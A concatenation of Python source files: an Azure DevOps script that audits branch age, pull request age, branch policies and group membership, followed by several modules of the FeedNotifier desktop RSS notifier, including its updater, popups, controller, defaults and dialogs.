f"##vso[task.logissue type=error] Response message: {MESSAGE}"
)
sys.exit(1)
else:
LATEST_COMMIT_ID = RESPONSE.json()["value"][0]["commitId"]
LATEST_COMMIT_DATE = RESPONSE.json()["value"][0][
"committer"
]["date"]
LATEST_COMMIT_SHORT_DATE = LATEST_COMMIT_DATE.split("T")[0]
LATEST_COMMIT_SHORT_DATE_TIME = datetime.strptime(
LATEST_COMMIT_SHORT_DATE, DATE_FORMAT
)
CURRENT_DATE = date.today().strftime("%Y-%m-%d")
CURRENT_DATE_TIME = datetime.strptime(
CURRENT_DATE, DATE_FORMAT
)
LATEST_COMMIT_AGE = (
CURRENT_DATE_TIME - LATEST_COMMIT_SHORT_DATE_TIME
)
if int(LATEST_COMMIT_AGE.days) > int(ARGS.maxCommitAge):
print(
f"##vso[task.logissue type=error] Latest commit {LATEST_COMMIT_ID} is too old: {LATEST_COMMIT_AGE.days} day(s)"
)
OUTDATED_BRANCHES.append(BRANCH_SHORTNAME)
else:
pass
elif BRANCH_SHORTNAME == "master":
pass
elif "refs/tags/v" in BRANCH_NAME:
pass
elif "refs/pull/" in BRANCH_NAME:
pass
else:
UNKNOWN_BRANCHES.append(BRANCH_NAME)
URL = "{}/{}/_apis/git/repositories/{}/pullrequests?api-version=5.0".format(
ARGS.organization, ARGS.projectName, REPO_ID
)
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(
f"##vso[task.logissue type=error] Response message: {MESSAGE}"
)
sys.exit(1)
else:
PRS = RESPONSE.json()["value"]
for PR in PRS:
PR_ID = PR["pullRequestId"]
PR_DRAFT_STATUS = PR["isDraft"]
if not PR_DRAFT_STATUS: # Don't need to check Draft PRs
PR_DATE = PR["creationDate"]
PR_SHORT_DATE = PR_DATE.split("T")[0]
PR_SHORT_DATE_TIME = datetime.strptime(
PR_SHORT_DATE, DATE_FORMAT
)
CURRENT_DATE = date.today().strftime("%Y-%m-%d")
CURRENT_DATE_TIME = datetime.strptime(
CURRENT_DATE, DATE_FORMAT
)
PR_AGE = CURRENT_DATE_TIME - PR_SHORT_DATE_TIME
if int(PR_AGE.days) > int(ARGS.maxPullRequestAge):
OUTDATED_PRS.append(PR_ID)
else:
pass
else:
pass
if len(UNKNOWN_BRANCHES) == 0:
print("[INFO] All branch names follow standard")
else:
print(
f"##vso[task.logissue type=warning] Branch names that do not follow standard: {UNKNOWN_BRANCHES}"
)
if len(OUTDATED_BRANCHES) == 0:
print("[INFO] All branches are up to date")
else:
print(
f"##vso[task.logissue type=warning] Outdated branches: {OUTDATED_BRANCHES}"
)
if len(OUTDATED_PRS) == 0:
print("[INFO] All Pull requests are up to date")
else:
print(
f"##vso[task.logissue type=warning] Outdated Pull requests: {OUTDATED_PRS}"
)
URL = "{}/{}/_apis/policy/configurations?api-version=5.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
BRANCH_POLICY_COUNT = RESPONSE.json()["count"]
if int(BRANCH_POLICY_COUNT) > 0:
MATCH_KIND = RESPONSE.json()["value"][0]["settings"]["scope"][0]["matchKind"]
REPO_ID = RESPONSE.json()["value"][0]["settings"]["scope"][0]["repositoryId"]
APPROVERS_COUNT = RESPONSE.json()["value"][0]["settings"][
"minimumApproverCount"
]
if (
MATCH_KIND == "Exact"
and REPO_ID is None
and APPROVERS_COUNT >= int(ARGS.minApproverCount)
):
print(
f"[INFO] default branch has reviewers policy assigned, minimum number of reviewers is {APPROVERS_COUNT}"
)
else:
print(
"##vso[task.logissue type=error] default branch does not have valid reviewers policy assigned"
)
print(f"[DEBUG] MATCH_KIND = {MATCH_KIND}")
print(f"[DEBUG] REPO_ID = {REPO_ID}")
print(f"[DEBUG] APPROVERS_COUNT = {APPROVERS_COUNT}")
sys.exit(1)
else:
print(
"##vso[task.logissue type=error] default branch does not have policies assigned"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | cloud/get_group_members.py | <filename>cloud/get_group_members.py
"""
This script gets current quantity of group members and compares it with desired
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--desiredMembersQuantity", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "https://vssps.dev.azure.com/{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_ID = GROUP["originId"]
break
try:
GROUP_ID
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group..")
URL = "https://vsaex.dev.azure.com/{}/_apis/GroupEntitlements/{}/members?api-version=5.0-preview.1".format(
ARGS.organization, GROUP_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_MEMBERS = RESPONSE.json()["members"]
CURRENT_MEMBERS_QUANTITY = len(CURRENT_MEMBERS)
if CURRENT_MEMBERS_QUANTITY == int(ARGS.desiredMembersQuantity):
print("[INFO] Current members quantity match desired")
else:
print(
"##vso[task.logissue type=error] Current members quantity does not match desired"
)
print(
f"##vso[task.logissue type=error] Desired members quantity = {ARGS.desiredMembersQuantity}"
)
print(
f"##vso[task.logissue type=error] Current members quantity = {CURRENT_MEMBERS_QUANTITY}"
)
print(
f"##vso[task.logissue type=error] Current members = {CURRENT_MEMBERS}"
)
sys.exit(1)
|
yabhinav/FeedNotifier | updater.py | import wx
import os
import time
import urllib
import tempfile
import util
from settings import settings
class CancelException(Exception):
pass
class DownloadDialog(wx.Dialog):
def __init__(self, parent):
super(DownloadDialog, self).__init__(parent, -1, 'Feed Notifier Update')
util.set_icon(self)
self.path = None
text = wx.StaticText(self, -1, 'Downloading update, please wait...')
self.gauge = wx.Gauge(self, -1, 100, size=(250, 16))
cancel = wx.Button(self, wx.ID_CANCEL, 'Cancel')
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(text)
sizer.AddSpacer(8)
sizer.Add(self.gauge, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(cancel, 0, wx.ALIGN_RIGHT)
wrapper = wx.BoxSizer(wx.VERTICAL)
wrapper.Add(sizer, 1, wx.EXPAND|wx.ALL, 10)
self.SetSizerAndFit(wrapper)
self.start_download()
def start_download(self):
util.start_thread(self.download)
def download(self):
try:
self.path = download_installer(self.listener)
wx.CallAfter(self.EndModal, wx.ID_OK)
except CancelException:
pass
except Exception:
wx.CallAfter(self.on_fail)
def on_fail(self):
dialog = wx.MessageDialog(self, 'Failed to download updates. Nothing will be installed at this time.', 'Update Failed', wx.OK|wx.ICON_ERROR)
dialog.ShowModal()
dialog.Destroy()
self.EndModal(wx.ID_CANCEL)
def update(self, percent):
if self:
self.gauge.SetValue(percent)
def listener(self, blocks, block_size, total_size):
size = blocks * block_size
percent = size * 100 / total_size
if self:
wx.CallAfter(self.update, percent)
else:
raise CancelException
def get_remote_revision():
file = None
try:
file = urllib.urlopen(settings.REVISION_URL)
return int(file.read().strip())
except Exception:
return -1
finally:
if file:
file.close()
def download_installer(listener):
fd, path = tempfile.mkstemp('.exe')
os.close(fd)
path, headers = urllib.urlretrieve(settings.INSTALLER_URL, path, listener)
return path
def should_check():
last_check = settings.UPDATE_TIMESTAMP
now = int(time.time())
elapsed = now - last_check
return elapsed >= settings.UPDATE_INTERVAL
def should_update(force):
if not force:
if not should_check():
return False
now = int(time.time())
settings.UPDATE_TIMESTAMP = now
local = settings.LOCAL_REVISION
remote = get_remote_revision()
if local < 0 or remote < 0:
return False
return remote > local
def do_check(controller, force=False):
if should_update(force):
wx.CallAfter(do_ask, controller)
elif force:
wx.CallAfter(do_tell, controller)
def do_ask(controller):
dialog = wx.MessageDialog(None, 'Feed Notifier software updates are available. Download and install now?', 'Update Feed Notifier?', wx.YES_NO|wx.YES_DEFAULT|wx.ICON_QUESTION)
if dialog.ShowModal() == wx.ID_YES:
do_download(controller)
dialog.Destroy()
def do_tell(controller):
dialog = wx.MessageDialog(None, 'No software updates are available at this time.', 'No Updates', wx.OK|wx.ICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def do_download(controller):
dialog = DownloadDialog(None)
dialog.Center()
result = dialog.ShowModal()
path = dialog.path
dialog.Destroy()
if result == wx.ID_OK:
do_install(controller, path)
def do_install(controller, path):
controller.close()
time.sleep(1)
os.execvp(path, (path, '/sp-', '/silent', '/norestart'))
def run(controller, force=False):
if force or settings.CHECK_FOR_UPDATES:
util.start_thread(do_check, controller, force)
|
yabhinav/FeedNotifier | popups.py | import wx
import webbrowser
from settings import settings
BLANK = 'about:blank'
COMMAND_CLOSE = 'http://close/'
COMMAND_NEXT = 'http://next/'
COMMAND_PREVIOUS = 'http://previous/'
COMMAND_FIRST = 'http://first/'
COMMAND_LAST = 'http://last/'
COMMAND_PLAY = 'http://play/'
COMMAND_PAUSE = 'http://pause/'
def position_window(window):
index = settings.POPUP_DISPLAY
if index >= wx.Display_GetCount():
index = 0
display = wx.Display(index)
x, y, w, h = display.GetClientArea()
cw, ch = window.GetSize()
pad = 10
x1 = x + pad
y1 = y + pad
x2 = x + w - cw - pad
y2 = y + h - ch - pad
x3 = x + w / 2 - cw / 2
y3 = y + h / 2 - ch / 2
lookup = {
(-1, -1): (x1, y1),
(1, -1): (x2, y1),
(-1, 1): (x1, y2),
(1, 1): (x2, y2),
(0, 0): (x3, y3),
}
window.SetPosition(lookup[settings.POPUP_POSITION])
class Event(wx.PyEvent):
def __init__(self, event_object, type):
super(Event, self).__init__()
self.SetEventType(type.typeId)
self.SetEventObject(event_object)
EVT_LINK = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_CLOSE = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_ENTER = wx.PyEventBinder(wx.NewEventType())
EVT_POPUP_LEAVE = wx.PyEventBinder(wx.NewEventType())
class PopupManager(wx.EvtHandler):
def __init__(self):
super(PopupManager, self).__init__()
self.timer = None
self.auto = settings.POPUP_AUTO_PLAY
self.cache = {}
self.hover_count = 0
def set_items(self, items, index=0, focus=False):
self.items = list(items)
self.index = index
self.count = len(self.items)
self.clear_cache(keep_current_item=True)
self.update(focus)
self.set_timer()
def update(self, focus=False):
item = self.items[self.index]
if item in self.cache:
self.show_frame(focus)
self.update_cache()
else:
self.update_cache(True)
self.show_frame(focus)
self.update_cache()
def update_cache(self, current_only=False):
indexes = set()
indexes.add(self.index)
if not current_only:
indexes.add(self.index - 1)
indexes.add(self.index + 1)
#indexes.add(0)
#indexes.add(self.count - 1)
items = set(self.items[index] for index in indexes if index >= 0 and index < self.count)
for item in items:
if item in self.cache:
continue
frame = self.create_frame(item)
self.cache[item] = frame
for item, frame in self.cache.items():
if item not in items:
frame.Close()
del self.cache[item]
def clear_cache(self, keep_current_item=False):
current_item = self.items[self.index]
for item, frame in self.cache.items():
if keep_current_item and item == current_item:
continue
frame.Close()
del self.cache[item]
def show_frame(self, focus=False):
current_item = self.items[self.index]
current_item.read = True
for item, frame in self.cache.items():
if item == current_item:
if focus:
frame.Show()
else:
frame.Disable()
frame.Show()
frame.Enable()
frame.Update()
if settings.POPUP_TRANSPARENCY < 255:
frame.SetTransparent(settings.POPUP_TRANSPARENCY)
for item, frame in self.cache.items():
if item != current_item:
frame.Hide()
def create_frame(self, item):
if True:#settings.POPUP_THEME == 'default':
import theme_default
context = self.create_context(item)
frame = theme_default.Frame(item, context)
frame.Bind(EVT_LINK, self.on_link)
frame.Bind(EVT_POPUP_ENTER, self.on_enter)
frame.Bind(EVT_POPUP_LEAVE, self.on_leave)
position_window(frame)
if settings.POPUP_TRANSPARENCY < 255:
frame.SetTransparent(0)
return frame
def create_context(self, item):
context = {}
count = str(self.count)
index = str(self.items.index(item) + 1)
index = '%s%s' % ('0' * (len(count) - len(index)), index)
context['item_index'] = index
context['item_count'] = count
context['is_playing'] = self.auto
context['is_paused'] = not self.auto
context['POPUP_WIDTH'] = settings.POPUP_WIDTH
context['COMMAND_CLOSE'] = COMMAND_CLOSE
context['COMMAND_NEXT'] = COMMAND_NEXT
context['COMMAND_PREVIOUS'] = COMMAND_PREVIOUS
context['COMMAND_FIRST'] = COMMAND_FIRST
context['COMMAND_LAST'] = COMMAND_LAST
context['COMMAND_PLAY'] = COMMAND_PLAY
context['COMMAND_PAUSE'] = COMMAND_PAUSE
return context
def set_timer(self):
if self.timer and self.timer.IsRunning():
return
duration = settings.POPUP_DURATION * 1000
self.timer = wx.CallLater(duration, self.on_timer)
def stop_timer(self):
if self.timer and self.timer.IsRunning():
self.timer.Stop()
self.timer = None
def on_enter(self, event):
event.Skip()
self.hover_count += 1
def on_leave(self, event):
event.Skip()
self.hover_count -= 1
def on_link(self, event):
link = event.link
# track the click
item = self.items[self.index]
feed = item.feed
if link == item.link or link == feed.link:
feed.clicks += 1
# handle the click
if link == BLANK:
event.Skip()
elif link == COMMAND_CLOSE:
self.on_close()
elif link == COMMAND_FIRST:
self.auto = False
self.on_first()
elif link == COMMAND_LAST:
self.auto = False
self.on_last()
elif link == COMMAND_NEXT:
self.auto = False
self.on_next()
elif link == COMMAND_PREVIOUS:
self.auto = False
self.on_previous()
elif link == COMMAND_PLAY:
if not self.auto:
self.auto = True
self.stop_timer()
self.on_timer()
elif link == COMMAND_PAUSE:
self.auto = False
else:
webbrowser.open(link)
def on_first(self):
self.index = 0
self.update(True)
def on_last(self):
self.index = self.count - 1
self.update(True)
def on_next(self, focus=True):
if self.index < self.count - 1:
self.index += 1
self.update(focus)
else:
self.on_close()
def on_previous(self):
if self.index > 0:
self.index -= 1
self.update(True)
def on_close(self):
self.stop_timer()
self.clear_cache()
event = Event(self, EVT_POPUP_CLOSE)
wx.PostEvent(self, event)
def on_timer(self):
self.timer = None
set_timer = False
if self.hover_count and settings.POPUP_WAIT_ON_HOVER:
set_timer = True
elif self.auto:
if self.index == self.count - 1:
self.on_close()
else:
self.on_next(False)
set_timer = True
if set_timer:
self.set_timer()
|
yabhinav/FeedNotifier | controller.py | import wx
import idle
import feeds
import popups
import view
import updater
import util
import winsound
import socket
from settings import settings
class Controller(object):
def __init__(self):
socket.setdefaulttimeout(settings.SOCKET_TIMEOUT)
self.icon = view.TaskBarIcon(self)
self.manager = feeds.FeedManager()
self.manager.load()
self.add_default_feeds()
self.popup = None
self.polling = False
self.enabled = True
self.on_poll()
self.on_check_for_updates()
def add_default_feeds(self):
if self.manager.feeds:
return
for url in settings.DEFAULT_FEED_URLS:
feed = feeds.Feed(url)
feed.interval = 60 * 60 * 24
self.manager.add_feed(feed)
def parse_args(self, message):
urls = message.split('\n')
for url in urls:
url = url.strip()
if not url:
continue
self.add_feed(url)
def enable(self):
self.icon.set_icon('icons/feed.png')
self.enabled = True
self.poll()
def disable(self):
self.icon.set_icon('icons/feed_disabled.png')
self.enabled = False
def save(self):
self.manager.save()
def on_check_for_updates(self):
try:
self.check_for_updates(False)
finally:
wx.CallLater(1000 * 60 * 5, self.on_check_for_updates)
def check_for_updates(self, force=True):
updater.run(self, force)
def on_poll(self):
try:
self.poll()
finally:
wx.CallLater(1000 * 5, self.on_poll)
def poll(self):
if self.polling:
return
if not self.enabled:
return
if settings.DISABLE_WHEN_IDLE and idle.get_idle_duration() > settings.USER_IDLE_TIMEOUT:
return
if not self.manager.should_poll():
return
self.polling = True
self.icon.set_icon('icons/feed_go.png')
util.start_thread(self._poll_thread)
def _poll_thread(self):
found_new = False
try:
for new_items in self.manager.poll():
found_new = True
wx.CallAfter(self._poll_result, new_items)
finally:
wx.CallAfter(self._poll_complete, found_new)
def _poll_result(self, new_items):
items = self.manager.items
if self.popup:
index = self.popup.index
else:
index = len(items)
items.extend(new_items)
self.show_items(items, index, False)
def _poll_complete(self, found_new):
if found_new:
self.save()
self.polling = False
self.icon.set_icon('icons/feed.png')
def force_poll(self):
for feed in self.manager.feeds:
feed.last_poll = 0
self.poll()
def show_items(self, items, index, focus):
play_sound = False
if not items:
return
if not self.popup:
self.popup = popups.PopupManager()
self.popup.Bind(popups.EVT_POPUP_CLOSE, self.on_popup_close)
if not focus:
play_sound = True
self.popup.set_items(items, index, focus)
if focus:
self.popup.auto = False
if play_sound:
self.play_sound()
def play_sound(self):
if settings.PLAY_SOUND:
path = settings.SOUND_PATH
flags = winsound.SND_FILENAME | winsound.SND_ASYNC
try:
winsound.PlaySound(path, flags)
except Exception:
pass
def show_popup(self):
items = self.manager.items
index = len(items) - 1
self.show_items(items, index, True)
def add_feed(self, url=''):
feed = view.AddFeedDialog.show_wizard(None, url)
if not feed:
return
self.manager.add_feed(feed)
self.save()
self.poll()
def edit_settings(self):
window = view.SettingsDialog(None, self)
window.Center()
window.ShowModal()
window.Destroy()
def close(self):
try:
if self.popup:
self.popup.on_close()
wx.CallAfter(self.icon.Destroy)
finally:
pass #wx.GetApp().ExitMainLoop()
def on_popup_close(self, event):
self.popup = None
self.manager.purge_items(settings.ITEM_CACHE_AGE)
|
yabhinav/FeedNotifier | defaults.py | # Helper Functions
def load_revision():
try:
with open('revision.txt', 'r') as file:
return int(file.read().strip())
except Exception:
return -1
# Popup Settings
POPUP_DURATION = 5
POPUP_AUTO_PLAY = True
POPUP_WAIT_ON_HOVER = True
POPUP_THEME = 'default'
POPUP_WIDTH = 400
POPUP_POSITION = (1, 1)
POPUP_TRANSPARENCY = 230
POPUP_TITLE_LENGTH = 120
POPUP_BODY_LENGTH = 400
POPUP_DISPLAY = 0
POPUP_STAY_ON_TOP = True
POPUP_BORDER_SIZE = 3
POPUP_BORDER_COLOR = (0, 0, 0)
# Application Settings
APP_ID = 'FeedNotifier'
APP_NAME = 'Feed Notifier'
APP_VERSION = '2.6.1'
APP_URL = 'http://www.feednotifier.com/'
USER_AGENT = '%s/%s +%s' % (APP_ID, APP_VERSION, APP_URL)
DEFAULT_POLLING_INTERVAL = 60 * 15
USER_IDLE_TIMEOUT = 60
DISABLE_WHEN_IDLE = True
ITEM_CACHE_AGE = 60 * 60 * 24 * 1
FEED_CACHE_SIZE = 1000
MAX_WORKER_THREADS = 10
PLAY_SOUND = True
SOUND_PATH = 'sounds/notification.wav'
SOCKET_TIMEOUT = 15
# Initial Setup
DEFAULT_FEED_URLS = [
'http://www.feednotifier.com/welcome.xml',
]
# Proxy Settings
USE_PROXY = False
PROXY_URL = ''
# Updater Settings
LOCAL_REVISION = load_revision()
REVISION_URL = 'http://www.feednotifier.com/update/revision.txt'
INSTALLER_URL = 'http://www.feednotifier.com/update/installer.exe'
CHECK_FOR_UPDATES = True
UPDATE_INTERVAL = 60 * 60 * 24 * 1
UPDATE_TIMESTAMP = 0
del load_revision
|
yabhinav/FeedNotifier | view.py | <gh_stars>1-10
import wx
import util
import feeds
import filters
from settings import settings
INDEX_ENABLED = 0
INDEX_URL = 1
INDEX_TITLE = 2
INDEX_INTERVAL = 3
INDEX_ITEM_COUNT = 4
INDEX_CLICKS = 5
INDEX_RULES = 1
INDEX_FEEDS = 2
INDEX_IN = 3
INDEX_OUT = 4
class TaskBarIcon(wx.TaskBarIcon):
def __init__(self, controller):
super(TaskBarIcon, self).__init__()
self.controller = controller
self.set_icon('icons/feed.png')
self.Bind(wx.EVT_TASKBAR_LEFT_DOWN, self.on_left_down)
def CreatePopupMenu(self):
menu = wx.Menu()
util.menu_item(menu, 'Add Feed...', self.on_add_feed, 'icons/add.png')
util.menu_item(menu, 'Preferences...', self.on_settings, 'icons/cog.png')
menu.AppendSeparator()
if self.controller.enabled:
util.menu_item(menu, 'Disable Updates', self.on_disable, 'icons/delete.png')
util.menu_item(menu, 'Update Now', self.on_force_update, 'icons/transmit.png')
else:
util.menu_item(menu, 'Enable Updates', self.on_enable, 'icons/accept.png')
item = util.menu_item(menu, 'Update Now', self.on_force_update, 'icons/transmit.png')
item.Enable(False)
menu.AppendSeparator()
util.menu_item(menu, 'Exit', self.on_exit, 'icons/door_out.png')
return menu
def set_icon(self, path):
icon = wx.IconFromBitmap(wx.Bitmap(path))
self.SetIcon(icon, settings.APP_NAME)
def on_exit(self, event):
self.controller.close()
def on_left_down(self, event):
self.controller.show_popup()
def on_force_update(self, event):
self.controller.force_poll()
def on_disable(self, event):
self.controller.disable()
def on_enable(self, event):
self.controller.enable()
def on_add_feed(self, event):
self.controller.add_feed()
def on_settings(self, event):
self.controller.edit_settings()
class AddFeedDialog(wx.Dialog):
@staticmethod
def show_wizard(parent, url=''):
while True:
window = AddFeedDialog(parent, url)
window.Center()
result = window.ShowModal()
data = window.result
window.Destroy()
if result != wx.ID_OK:
return None
url = data.original_url
entries = util.get(data, 'entries', [])
feed = feeds.Feed(url)
feed.title = util.get(data.feed, 'title', '')
feed.link = util.get(data.feed, 'link', '')
feed.username = util.encode_password(data.username)
feed.password = <PASSWORD>.encode_password(data.password)
feed.interval = util.guess_polling_interval(entries)
window = EditFeedDialog(parent, feed, True)
window.Center()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_BACKWARD:
continue
if result == wx.ID_OK:
return feed
return None
def __init__(self, parent, initial_url=''):
super(AddFeedDialog, self).__init__(parent, -1, 'Add RSS/Atom Feed')
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.initial_url = initial_url
self.result = None
panel = self.create_panel(self)
self.Fit()
self.validate()
def get_initial_url(self):
if self.initial_url:
return self.initial_url
if wx.TheClipboard.Open():
object = wx.TextDataObject()
success = wx.TheClipboard.GetData(object)
wx.TheClipboard.Close()
if success:
url = object.GetText()
if url.startswith('http'):
return url
return ''
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
buttons = self.create_buttons(panel)
line = wx.StaticLine(panel, -1)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 25)
sizer.AddStretchSpacer(1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
label = wx.StaticText(parent, -1, 'Feed URL')
font = label.GetFont()
font.SetWeight(wx.FONTWEIGHT_BOLD)
label.SetFont(font)
value = self.get_initial_url()
value = value.replace('feed:https://', 'https://')
value = value.replace('feed://', 'http://')
url = wx.TextCtrl(parent, -1, value, size=(300, -1))
url.Bind(wx.EVT_TEXT, self.on_text)
status = wx.StaticText(parent, -1, '')
sizer.Add(label, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(url, (0, 1))
sizer.Add(status, (1, 1))
self.url = url
self.status = status
return sizer
def create_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
back = wx.Button(parent, wx.ID_BACKWARD, '< Back')
next = wx.Button(parent, wx.ID_FORWARD, 'Next >')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
back.Disable()
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(back)
sizer.AddSpacer(4)
sizer.Add(next)
sizer.AddSpacer(16)
sizer.Add(cancel)
return sizer
def validate(self):
if self.url.GetValue():
self.next.Enable()
else:
self.next.Disable()
def on_text(self, event):
self.validate()
def on_next(self, event):
url = self.url.GetValue()
self.lock()
util.start_thread(self.check_feed, url)
def on_valid(self, result):
self.result = result
self.EndModal(wx.ID_OK)
def on_invalid(self):
dialog = wx.MessageDialog(self, 'The URL entered does not appear to be a valid RSS/Atom feed.', 'Invalid Feed', wx.OK|wx.ICON_ERROR)
dialog.Center()
dialog.ShowModal()
dialog.Destroy()
self.unlock()
def on_password(self, url, username, password):
dialog = PasswordDialog(self, username, password)
dialog.Center()
result = dialog.ShowModal()
username = dialog.username.GetValue()
password = dialog.password.GetValue()
dialog.Destroy()
if result == wx.ID_OK:
util.start_thread(self.check_feed, url, username, password)
else:
self.unlock()
def lock(self):
self.url.Disable()
self.next.Disable()
self.status.SetLabel('Checking feed, please wait...')
def unlock(self):
self.url.Enable()
self.next.Enable()
self.status.SetLabel('')
self.url.SelectAll()
self.url.SetFocus()
def check_feed(self, url, username=None, password=None):
d = util.parse(url, username, password)
if not self: # cancelled
return
status = util.get(d, 'status', 0)
if status == 401: # auth required
wx.CallAfter(self.on_password, url, username, password)
elif util.is_valid_feed(d):
d['original_url'] = url
d['username'] = username
d['password'] = password
wx.CallAfter(self.on_valid, d)
else:
wx.CallAfter(self.on_invalid)
class PasswordDialog(wx.Dialog):
def __init__(self, parent, username=None, password=None):
super(PasswordDialog, self).__init__(parent, -1, 'Password Required')
util.set_icon(self)
panel = self.create_panel(self)
if username:
self.username.SetValue(username)
if password:
self.password.SetValue(password)
self.Fit()
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
buttons = self.create_buttons(panel)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 12)
sizer.AddStretchSpacer(1)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL&~wx.TOP, 12)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
label = wx.StaticText(parent, -1, 'Username')
username = wx.TextCtrl(parent, -1, '', size=(180, -1))
username.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(label, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(username, (0, 1))
self.username = username
label = wx.StaticText(parent, -1, 'Password')
password = wx.TextCtrl(parent, -1, '', size=(180, -1), style=wx.TE_PASSWORD)
password.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(label, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(password, (1, 1))
self.password = password
return sizer
def create_buttons(self, parent):
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
ok.SetDefault()
ok.Disable()
self.ok = ok
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
return sizer
def validate(self):
if self.username.GetValue() and self.password.GetValue():
self.ok.Enable()
else:
self.ok.Disable()
def on_text(self, event):
self.validate()
class EditFeedDialog(wx.Dialog):
def __init__(self, parent, feed, add=False):
title = 'Add RSS/Atom Feed' if add else 'Edit RSS/Atom Feed'
super(EditFeedDialog, self).__init__(parent, -1, title)
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.feed = feed
self.add = add
panel = self.create_panel(self)
self.Fit()
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
if self.add:
buttons = self.create_add_buttons(panel)
else:
buttons = self.create_edit_buttons(panel)
line = wx.StaticLine(panel, -1)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 25)
sizer.AddStretchSpacer(1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
indexes = [0, 1, 3, 5, 7]
labels = ['Feed URL', 'Feed Title', 'Feed Link', 'Polling Interval', 'Border Color']
for index, text in zip(indexes, labels):
label = wx.StaticText(parent, -1, text)
font = label.GetFont()
